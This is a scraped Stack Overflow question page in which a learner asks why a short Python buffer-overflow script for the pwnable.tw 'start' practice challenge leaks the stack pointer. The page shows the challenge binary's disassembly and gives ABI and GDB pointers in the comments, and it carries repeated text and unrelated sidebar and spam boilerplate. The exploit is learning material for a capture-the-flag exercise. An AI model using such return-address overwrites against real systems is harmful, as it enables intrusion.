Exploiting system calls in assemblyCalling an external command in PythonJumping to the next “instruction” using gdbBase pointer and stack pointerunable to read from file when user provides filename (x86 assembly program using nasm)execv example is segfaultingASM x86 Function call : best method to save EBP and common registers (EAX, EBX, …)NASM on linux: Using sys_read adds extra line at the endGNU Assembler sys_write is not workingC++ code for testing the Collatz conjecture faster than hand-written assembly - why?Safely Searching Virtual Address Space using NASM

USPS Back Room - Trespassing?

How does the EU Emissions Trading Scheme account for increased emissions outside the EU?

WordPress 5.2.1 deactivated my jQuery

includegraphics: get the "scale" value of a figure whose size is expressed by "width"

How to melt snow without fire or body heat?

Why did Theresa May offer a vote on a second Brexit referendum?

Why did British Steel have to borrow 120 million pounds (from the government) to cover its ETS obligations?

Should there be an "a" before "ten years imprisonment"?

Why are GND pads often only connected by four traces?

Nuke it from orbit - surely can only mean bin and buy replacement?

Which European Languages are not Indo-European?

What is the meaning of "<&3" and "done < file11 3< file22"

Take elements from a list based on two criteria

Can a person survive on blood in place of water?

The art of clickbait captions

Manager questioning my time estimates for a project

How to cut a climbing rope?

Did this character show any indication of wanting to rule before S8E6?

Gravitational Force Between Numbers

便利な工具 what does な means

Can I tell a prospective employee that everyone in the team is leaving?

My players want to grind XP but we're using milestone advancement

Is it possible to remotely hack the GPS system and disable GPS service worldwide?

Is it legal to have an abortion in another state or abroad?



Exploiting system calls in assembly


Calling an external command in PythonJumping to the next “instruction” using gdbBase pointer and stack pointerunable to read from file when user provides filename (x86 assembly program using nasm)execv example is segfaultingASM x86 Function call : best method to save EBP and common registers (EAX, EBX, …)NASM on linux: Using sys_read adds extra line at the endGNU Assembler sys_write is not workingC++ code for testing the Collatz conjecture faster than hand-written assembly - why?Safely Searching Virtual Address Space using NASM






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty height:90px;width:728px;box-sizing:border-box;








0















I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:



start: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060: 54 push esp
 8048061: 68 9d 80 04 08 push 0x804809d
 8048066: 31 c0 xor eax,eax
 8048068: 31 db xor ebx,ebx
 804806a: 31 c9 xor ecx,ecx
 804806c: 31 d2 xor edx,edx
 804806e: 68 43 54 46 3a push 0x3a465443
 8048073: 68 74 68 65 20 push 0x20656874
 8048078: 68 61 72 74 20 push 0x20747261
 804807d: 68 73 20 73 74 push 0x74732073
 8048082: 68 4c 65 74 27 push 0x2774654c
 8048087: 89 e1 mov ecx,esp ; buffer = $esp
 8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
 804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
 804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
 804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
 8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
 8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
 8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
 8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
 8048099: 83 c4 14 add esp,0x14
 804809c: c3 ret 

0804809d <_exit>:
 804809d: 5c pop esp
 804809e: 31 c0 xor eax,eax
 80480a0: 40 inc eax


Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.



However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?



from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = 0:08x'.format(esp)


I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.






python security assembly x86 exploit







share|improve this question
























  • What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

    – Peter Cordes
    Mar 24 at 1:35












  • Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

    – Peter Cordes
    Mar 24 at 1:37











  • @PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

    – Gabriel Rebello
    Mar 24 at 1:47

















0















I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:



start: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060: 54 push esp
 8048061: 68 9d 80 04 08 push 0x804809d
 8048066: 31 c0 xor eax,eax
 8048068: 31 db xor ebx,ebx
 804806a: 31 c9 xor ecx,ecx
 804806c: 31 d2 xor edx,edx
 804806e: 68 43 54 46 3a push 0x3a465443
 8048073: 68 74 68 65 20 push 0x20656874
 8048078: 68 61 72 74 20 push 0x20747261
 804807d: 68 73 20 73 74 push 0x74732073
 8048082: 68 4c 65 74 27 push 0x2774654c
 8048087: 89 e1 mov ecx,esp ; buffer = $esp
 8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
 804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
 804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
 804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
 8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
 8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
 8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
 8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
 8048099: 83 c4 14 add esp,0x14
 804809c: c3 ret 

0804809d <_exit>:
 804809d: 5c pop esp
 804809e: 31 c0 xor eax,eax
 80480a0: 40 inc eax


Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.



However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?



from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = 0:08x'.format(esp)


I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.






python security assembly x86 exploit







share|improve this question
























  • What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

    – Peter Cordes
    Mar 24 at 1:35












  • Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

    – Peter Cordes
    Mar 24 at 1:37











  • @PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

    – Gabriel Rebello
    Mar 24 at 1:47













0












0








0








I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:



start: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060: 54 push esp
 8048061: 68 9d 80 04 08 push 0x804809d
 8048066: 31 c0 xor eax,eax
 8048068: 31 db xor ebx,ebx
 804806a: 31 c9 xor ecx,ecx
 804806c: 31 d2 xor edx,edx
 804806e: 68 43 54 46 3a push 0x3a465443
 8048073: 68 74 68 65 20 push 0x20656874
 8048078: 68 61 72 74 20 push 0x20747261
 804807d: 68 73 20 73 74 push 0x74732073
 8048082: 68 4c 65 74 27 push 0x2774654c
 8048087: 89 e1 mov ecx,esp ; buffer = $esp
 8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
 804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
 804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
 804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
 8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
 8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
 8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
 8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
 8048099: 83 c4 14 add esp,0x14
 804809c: c3 ret 

0804809d <_exit>:
 804809d: 5c pop esp
 804809e: 31 c0 xor eax,eax
 80480a0: 40 inc eax


Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.



However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?



from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = 0:08x'.format(esp)


I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.






python security assembly x86 exploit







share|improve this question
















I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:



start: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060: 54 push esp
 8048061: 68 9d 80 04 08 push 0x804809d
 8048066: 31 c0 xor eax,eax
 8048068: 31 db xor ebx,ebx
 804806a: 31 c9 xor ecx,ecx
 804806c: 31 d2 xor edx,edx
 804806e: 68 43 54 46 3a push 0x3a465443
 8048073: 68 74 68 65 20 push 0x20656874
 8048078: 68 61 72 74 20 push 0x20747261
 804807d: 68 73 20 73 74 push 0x74732073
 8048082: 68 4c 65 74 27 push 0x2774654c
 8048087: 89 e1 mov ecx,esp ; buffer = $esp
 8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
 804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
 804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
 804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
 8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
 8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
 8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
 8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
 8048099: 83 c4 14 add esp,0x14
 804809c: c3 ret 

0804809d <_exit>:
 804809d: 5c pop esp
 804809e: 31 c0 xor eax,eax
 80480a0: 40 inc eax


Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.



However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?



from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = 0:08x'.format(esp)


I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.






python security assembly x86 exploit




python security assembly x86 exploit






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Mar 24 at 1:33









Peter Cordes

141k20215356




141k20215356










asked Mar 24 at 1:06









Gabriel RebelloGabriel Rebello

5201411




5201411












  • What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

    – Peter Cordes
    Mar 24 at 1:35












  • Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

    – Peter Cordes
    Mar 24 at 1:37











  • @PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

    – Gabriel Rebello
    Mar 24 at 1:47

















  • What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

    – Peter Cordes
    Mar 24 at 1:35












  • Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

    – Peter Cordes
    Mar 24 at 1:37











  • @PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

    – Gabriel Rebello
    Mar 24 at 1:47
















What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

– Peter Cordes
Mar 24 at 1:35






What are the calling conventions for UNIX & Linux system calls on i386 and x86-64 explains how the ABI works: ebx, ecx, edx, ... are passed (by the kernel) to its internal sys_write function which implements the Linux/POSIX write(fd, buf, len) system call. See What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? for more about the kernel side of things, how Linux collects args and dispatches to a function pointer based on the call number in EAX.

– Peter Cordes
Mar 24 at 1:35














Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

– Peter Cordes
Mar 24 at 1:37





Re: your last paragraph: you're asking someone to single-step this program in GDB for you and write down the results? If you think that would be a useful answer, why not do it yourself? GDB's layout reg should prove useful for watching register values change. See the bottom of stackoverflow.com/tags/x86/info for GDB tips.

– Peter Cordes
Mar 24 at 1:37













@PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

– Gabriel Rebello
Mar 24 at 1:47





@PeterCordes because I didn't know GDB could do this. Thanks for the tips, I'll post an answer if I succeed.

– Gabriel Rebello
Mar 24 at 1:47












0






active

oldest

votes












Your Answer






StackExchange.ifUsing("editor", function ()
StackExchange.using("externalEditor", function ()
StackExchange.using("snippets", function ()
StackExchange.snippets.init();
);
);
, "code-snippets");

StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "1"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);













draft saved

draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f55319849%2fexploiting-system-calls-in-assembly%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























0






active

oldest

votes








0






active

oldest

votes









active

oldest

votes






active

oldest

votes















draft saved

draft discarded
















































Thanks for contributing an answer to Stack Overflow!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f55319849%2fexploiting-system-calls-in-assembly%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







-

Popular posts from this blog

Kamusi Yaliyomo Aina za kamusi | Muundo wa kamusi | Faida za kamusi | Dhima ya picha katika kamusi | Marejeo | Tazama pia | Viungo vya nje | UrambazajiKuhusu kamusiGo-SwahiliWiki-KamusiKamusi ya Kiswahili na Kiingerezakuihariri na kuongeza habari

Image
Pages using ISBN magic linksMbegu za lughaKamusiIsimu nenoKiarabukitabulughaKiswahilialfabetimaanaufafanuzimanenomuhtasarisarufividahizoalfabeti Kamusi Kutoka Wikipedia, kamusi elezo huru Jump to navigation Jump to search Kamusi za Kiswahili Kamusi ya Kiswahili-Kiswahili (kamusi wahidiya) Kamusi ya Kiswahili - Kiingereza (kamusi thania) Kamusi (kutoka neno la Kiarabu قاموس qamus ) ni kitabu ambacho kinaorodhesha maneno ya lugha yaliyokusanywa kutoka kwa watumiaji wa lugha fulani, kwa mfano lugha ya Kiswahili. Maneno hupangwa kwa mtindo wa alfabeti, hutoa maana, asili na ufafanuzi wa utumizi wa maneno na jinsi yanavyotumika au yanavyotamkwa. [1] Yaliyomo 1 Aina za kamusi 2 Muundo wa kamusi 2.1 1. Utangulizi wa kamusi 2.2 2. Matini ya kamusi 2.3 3. Sherehe ya kamusi 3 Faida za kamusi 4 Dhima ya picha katika kamusi 5 Marejeo 6 Tazama pia 7 Viungo vya nje Aina za kamusi | Kuna aina mbalimbali za kamusi ambazo ni: Kamusi wahidiya yaani ya l
Read more

Swift 4 - func physicsWorld not invoked on collision? The Next CEO of Stack OverflowHow to call Objective-C code from Swift#ifdef replacement in the Swift language@selector() in Swift?#pragma mark in Swift?Swift for loop: for index, element in array?dispatch_after - GCD in Swift?Swift Beta performance: sorting arraysSplit a String into an array in Swift?The use of Swift 3 @objc inference in Swift 4 mode is deprecated?How to optimize UITableViewCell, because my UITableView lags

Image
Strange use of "whether ... than ..." in official text Could a dragon use its wings to swim? Car headlights in a world without electricity How to avoid supervisors with prejudiced views? Is the offspring between a demon and a celestial possible? If so what is it called and is it in a book somewhere? Can I board the first leg of the flight without having final country's PR card? subequations: How to continue numbering within subequation? How do you define an element with an ID attribute using LWC? Relevant Part for a Badminton Serve What CSS properties can the br tag have? What are the unusually-enlarged wing sections on this P-38 Lightning? Why did early computer designers eschew integers? Is it a bad idea to plug the other end of ESD strap to wall ground? Magento 1.9 observer on only new product added ( no updated product ) Airplane gently rocking its wings during whole flight It is correct to match light sources with the same color temperat
Read more

Access current req object everywhere in Node.js ExpressWhy are global variables considered bad practice? (node.js)Using req & res across functionsHow do I get the path to the current script with Node.js?What is Node.js' Connect, Express and “middleware”?Node.js w/ express error handling in callbackHow to access the GET parameters after “?” in Express?Modify Node.js req object parametersAccess “app” variable inside of ExpressJS/ConnectJS middleware?Node.js Express app - request objectAngular Http Module considered middleware?Session variables in ExpressJSAdd properties to the req object in expressjs with Typescript

Image
What steps should I take to lawfully visit the United States as a tourist immediately after visiting on a B-1 visa? Would dual wielding daggers be a viable choice for a covert bodyguard? For a hashing function like MD5, how similar can two plaintext strings be and still generate the same hash? Using Newton's shell theorem to accelerate a spaceship Why doesn't sea level show seasonality? What prevents someone from claiming to be the murderer in order to get the real murderer off? Has anyone in space seen or photographed a simple laser pointer from Earth? What does (void *)1 mean Why does the U.S. tolerate foreign influence from Saudi Arabia and Israel on its domestic policies while not tolerating that from China or Russia? Modulus Operandi What's the point of having a RAID 1 configuration over incremental backups to a secondary drive? How to ask for a LinkedIn endorsement? Good resources for solving techniques (Metaheuristics, MILP, CP etc) How woul
Read more